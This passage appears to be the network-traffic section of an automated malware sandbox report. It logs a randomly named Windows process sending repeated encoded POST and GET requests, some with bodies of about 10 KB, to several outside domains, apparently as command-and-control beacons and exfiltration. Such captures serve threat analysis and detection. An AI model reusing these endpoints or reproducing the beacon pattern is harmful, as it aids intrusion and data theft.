                                                                            Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                                            Jun 19, 2024 22:41:04.873624086 CEST | 1236 | IN
                                                                            Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                                            Jun 19, 2024 22:41:04.873675108 CEST | 1236 | IN
                                                                            Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                                                            Jun 19, 2024 22:41:04.873727083 CEST | 878 | IN
                                                                            Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            34 | 192.168.2.4 | 49778 | 35.214.235.206 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:41:09.959657907 CEST | 693 | OUT | POST /4iea/ HTTP/1.1
                                                                            Host: www.grecanici.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.grecanici.com
                                                                            Referer: http://www.grecanici.com/4iea/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:41:10.590784073 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:41:10 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            X-Httpd: 1
                                                                            Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                            X-Proxy-Cache-Info: DT:1
                                                                            Content-Encoding: br


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            35 | 192.168.2.4 | 49779 | 35.214.235.206 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:41:12.502187967 CEST | 713 | OUT | POST /4iea/ HTTP/1.1
                                                                            Host: www.grecanici.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 223
                                                                            Origin: http://www.grecanici.com
                                                                            Referer: http://www.grecanici.com/4iea/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:41:13.108187914 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:41:13 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            X-Httpd: 1
                                                                            Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                            X-Proxy-Cache-Info: DT:1
                                                                            Content-Encoding: br


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            36 | 192.168.2.4 | 49780 | 162.241.253.174 | 80 | 1860 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:41:13.738082886 CEST | 523 | OUT | GET /nce6/?QTth=cdSXMBmhjDz&gheP1DX=Ed8kY/rwObA0p5m5nhu+szHCUNlmSGCiAjj4r6cZewWhLhgYO7hQm/tRjsXvcwXKbbEnwnHnz6fwjIdmgc2mtcrqJn2XJ43mDBubdDmUHoysA9KOkH3v2hY= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.ndhockeyprospects.com
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                            Jun 19, 2024 22:41:14.959733009 CEST | 655 | IN | HTTP/1.1 301 Moved Permanently
                                                                            Date: Wed, 19 Jun 2024 20:41:14 GMT
                                                                            Server: nginx/1.21.6
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 0
                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                            X-Redirect-By: WordPress
                                                                            Content-Security-Policy: upgrade-insecure-requests
                                                                            Location: http://ndhockeyprospects.com/nce6/?QTth=cdSXMBmhjDz&gheP1DX=Ed8kY/rwObA0p5m5nhu+szHCUNlmSGCiAjj4r6cZewWhLhgYO7hQm/tRjsXvcwXKbbEnwnHnz6fwjIdmgc2mtcrqJn2XJ43mDBubdDmUHoysA9KOkH3v2hY=
                                                                            host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                            X-Endurance-Cache-Level: 2
                                                                            X-nginx-cache: WordPress
                                                                            X-Server-Cache: true
                                                                            X-Proxy-Cache: MISS


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            37 | 192.168.2.4 | 49781 | 35.214.235.206 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:41:15.031759024 CEST | 10795 | OUT | POST /4iea/ HTTP/1.1
                                                                            Host: www.grecanici.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 10303
                                                                            Origin: http://www.grecanici.com
                                                                            Referer: http://www.grecanici.com/4iea/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:41:15.718842030 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:41:15 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            X-Httpd: 1
                                                                            Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                            X-Proxy-Cache-Info: DT:1
                                                                            Content-Encoding: br
                                                                            Data Ascii: ""3!%m+Fn-D%ah[?j '[O.2d$DB]@rI-9d.SI,I'!<5%dg0$4&zbb40HJ>d/ZO_,I9E,)"=R"b8HE]Xa0EOaZOd)\GU}q]mkl$}'E!z&K
                                                                            Jun 19, 2024 22:41:15.719146013 CEST1236INData Raw: 1a 48 8b 45 cb 76 7f e1 37 ad 26 5a 48 23 6a a0 b9 dc 56 e1 70 53 86 b4 87 e1 ae 8c ac 81 fe 72 8a c3 92 d2 1e 86 91 35 d0 62 a8 87 88 38 24 79 46 ba 4c 39 a0 e9 25 19 44 f6 4c 34 9a 72 88 08 c3 8c 96 89 5e 53 0e 81 b6 30 8c a8 81 76 73 4a 0d cb
                                                                            Data Ascii: HEv7&ZH#jVpSr5b8$yFL9%DL4r^S0vsJI;s5t<S7sl27dM,ITn.SKH<:-YXRPWX,EW8y^v@YMcS}pYR@ML"%#{3Z8Y
                                                                            Jun 19, 2024 22:41:15.719172955 CEST1236INData Raw: 3e 70 e1 70 90 e4 18 90 02 a8 0f bc 5f af a3 c1 5a c9 b0 af be 2f 02 9f 78 df fb 80 03 a2 6f 8d 90 3d 75 48 a4 35 36 4b 92 1c 15 0d 9f fc c9 53 07 46 ff 08 59 fb 87 46 4f 61 74 49 3e ff 86 c3 a3 89 9e 81 03 a4 c5 68 38 0a 1a 0e 92 26 7a 06 0e 93
                                                                            Data Ascii: >pp_Z/xo=uH56KSFYFOatI>h8&zdC+F,z@xAa=Li#d)bI)hX1j@^K{kg"V-V""2qo%""-V"`t|so/q=%=`d)JDD$z&%""=
                                                                            Jun 19, 2024 22:41:15.724261045 CEST1236INData Raw: 97 73 1b 52 b8 31 96 4c 11 a4 9e a0 3d 0c 57 74 5b 52 b8 2f 96 6c 53 92 6e e3 e7 c2 d3 68 0f 23 bb 9c dc 4a a1 dd 64 8a 20 7b aa 04 ed 61 a4 a4 5b 29 f4 9b 48 10 04 46 23 b8 3c a9 34 9c 5e 92 e1 92 1a 41 60 dc 9e 34 fe 61 8d 93 c0 24 df 84 84 84
                                                                            Data Ascii: sR1L=Wt[R/lSnh#Jd {a[)HF#<4^A`4a$<)T9!$4t!!!C$)T:"$4tj\Pz5NS4$E<[~jxQvq=nzufbAxhE[$NO{^^f=\h


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            38 | 192.168.2.4 | 49782 | 35.214.235.206 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:41:17.565459967 CEST | 432 | OUT | GET /4iea/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=LPPTutp79E4NI/FSO4tKhhCSj88LXvNdsgpq5qffN1EY6wk4NmMiGrfPgNjCGewOe8/3zUEWliAlmzRgBncp+x+MZNm8bqFqjUBXzLeJ0h1+xCuEpOdbPDQ= HTTP/1.1
                                                                            Host: www.grecanici.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:41:18.200786114 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:41:18 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            X-Httpd: 1
                                                                            Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
                                                                            X-Proxy-Cache: MISS
                                                                            X-Proxy-Cache-Info: 0 NC:000000 UP:


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            39 | 192.168.2.4 | 49783 | 202.95.21.152 | 80 | 1860 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:41:30.198082924 CEST | 774 | OUT | POST /3in6/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.qmancha.com
                                                                            Content-Length: 204
                                                                            Connection: close
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.qmancha.com
                                                                            Referer: http://www.qmancha.com/3in6/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                            Data Ascii: gheP1DX=McAYGJEYjxZmY1jgYkvxiUEn8nBU/ekXTP/QVceGweMGWtpcElgVrlQYKGqm2lID9LMJadgpoDwSzcxCfMvNQYUMmrri3QaN9gy7m5bxIAbpAFdX/ZZplaR0Bzlw8RNO2wnx6O6zYpPWreJQ9IIPdpWny/EgdTq12y0HJoqVgw5iXcleUtdoK+n5IHw/2E45Pw==
                                                                            Jun 19, 2024 22:41:31.101912975 CEST | 190 | IN | HTTP/1.1 400 Bad Request
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:41:30 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Data Ascii: d404 Not Found0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            40 | 192.168.2.4 | 49784 | 18.178.206.118 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:41:31.772403002 CEST | 678 | OUT | POST /hcaw/ HTTP/1.1
                                                                            Host: www.93v0.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.93v0.com
                                                                            Referer: http://www.93v0.com/hcaw/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6=aYRfiZpqinkB3uBDetwtvhRpxrSgX3JF/VugKP16BAcYuoiCm7emLkhZ32laP4nK1PGkvcrDQSdd2gzhjinIlXnW0Ms+tyLYzM2T9ZrKtJtt6fA3CD+yjDU6Z+/YoaWVOV9XeM32qHfGfG47etaTOzOr6nzLJQrLv3CdqN6CGjF6E7qh9iWVq9kUzH0WC/nDyA==
                                                                            Jun 19, 2024 22:41:32.572886944 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:41:32 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            41 | 192.168.2.4 | 49785 | 202.95.21.152 | 80 | 1860 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:41:32.734376907 CEST | 794 | OUT | POST /3in6/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.qmancha.com
                                                                            Content-Length: 224
                                                                            Connection: close
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.qmancha.com
                                                                            Referer: http://www.qmancha.com/3in6/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                            Data Ascii: gheP1DX=McAYGJEYjxZmX1TgZH3xqUEkzHBU1+kLTPDQVZmWwtoGT9ZcHh0VqlQYCmqp8FI29LI3accpoCQSzdBCf/HMRIUOuLqkoAaN9gy7m4/bIADpA1tX99NumaR1Gzlw2xMm2wnp6LjYYrHWrf5Q+dkMEZWt/fF+cRLCsXILKo2FjzVbWa0EFc8/Y+DKVA5L7HFwU4QuAR/190rOvy4YTBz4uW4=
                                                                            Jun 19, 2024 22:41:33.761301041 CEST | 190 | IN | HTTP/1.1 400 Bad Request
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:41:33 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Data Ascii: d404 Not Found0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            42 | 192.168.2.4 | 49786 | 18.178.206.118 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:41:34.315742970 CEST | 698 | OUT | POST /hcaw/ HTTP/1.1
                                                                            Host: www.93v0.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 223
                                                                            Origin: http://www.93v0.com
                                                                            Referer: http://www.93v0.com/hcaw/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6=aYRfiZpqinkBxPRDYOYtkhR29LSgCHJB/VSgKOBUA2kYtJSCh6emC0hZ/WlDBYn/1PLEvd7DQSJd2i7hiRPXnHmw4sswyiLYzM2T9aXstJlt7uw3DmLk8zU1PO/Yj6XSOV8CeJujqE3GfDU7e/+QAzOX0HypAR2RlFzMntSfADQYB977sT3C49AnuA9iP8aKpNwULpLhlOmrsZdLI1AJgag=
                                                                            Jun 19, 2024 22:41:35.131256104 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:41:35 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            43 | 192.168.2.4 | 49787 | 202.95.21.152 | 80 | 1860 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:41:35.274821997 CEST | 10876 | OUT | POST /3in6/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.qmancha.com
                                                                            Content-Length: 10304
                                                                            Connection: close
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.qmancha.com
                                                                            Referer: http://www.qmancha.com/3in6/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                            Jun 19, 2024 22:41:36.278764963 CEST | 190 | IN | HTTP/1.1 400 Bad Request
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:41:36 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: d404 Not Found0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            44 | 192.168.2.4 | 49788 | 18.178.206.118 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:41:36.858357906 CEST | 10780 | OUT | POST /hcaw/ HTTP/1.1
                                                                            Host: www.93v0.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 10303
                                                                            Origin: http://www.93v0.com
                                                                            Referer: http://www.93v0.com/hcaw/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:41:37.651166916 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:41:37 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            45 | 192.168.2.4 | 49789 | 202.95.21.152 | 80 | 1860 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:41:37.810060024 CEST | 513 | OUT | GET /3in6/?gheP1DX=Beo4F/wq8RdFDjebPnHj1X0mxngmjMMrNdTrW7vwt6cBBJ1fMwEGjCkFOHv2gXsTpd06O+ghlGNN6L13Yf+5YaxQqqrS/i2qyCLFr7bAJDv3UDERmc5Em7s=&QTth=cdSXMBmhjDz HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.qmancha.com
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                            Jun 19, 2024 22:41:38.812927008 CEST | 193 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:41:38 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            46 | 192.168.2.4 | 49790 | 18.178.206.118 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:41:39.388326883 CEST | 427 | OUT | GET /hcaw/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=Xa5/huFy8Eck4v8fb+wyxg1DlrWOKGB/lHr4KuxbDQUg1IaZpZOFGkNm4jxFFpbvuuzZpNiUUgQ/swG1ojXNoV7by9A8iCGRjPSG14/ArJMw+NsbE1irimM= HTTP/1.1
                                                                            Host: www.93v0.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:41:40.164597034 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:41:40 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            47 | 192.168.2.4 | 49791 | 66.96.162.149 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:41:45.471657991 CEST | 702 | OUT | POST /mjuo/ HTTP/1.1
                                                                            Host: www.leadchanges.info
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.leadchanges.info
                                                                            Referer: http://www.leadchanges.info/mjuo/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6=LWibrjoHVkt6rlTarIEIu/qzCf5ROgTDad5eLLHJo3eOI6hGA+m07oHS+xB1/swpzIeva08fKABtGrcf3/aTu54lG9W5m7GRz8DKmWoYZOhDjF7+xXJ7ZXHF7Ty4T2qqizlbBnNMLZSu9HPRWgGpkEnsIEaejg141M5zUzFZm/qbKkhEbJhOnPDaVIxZR5nTYw==
                                                                            Jun 19, 2024 22:41:45.979161024 CEST | 1087 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:41:45 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 867
                                                                            Connection: close
                                                                            Server: Apache
                                                                            Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                            Accept-Ranges: bytes
                                                                            Age: 0
                                                                            Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            48 | 192.168.2.4 | 49792 | 66.96.162.149 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:41:48.016074896 CEST | 722 | OUT | POST /mjuo/ HTTP/1.1
                                                                            Host: www.leadchanges.info
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
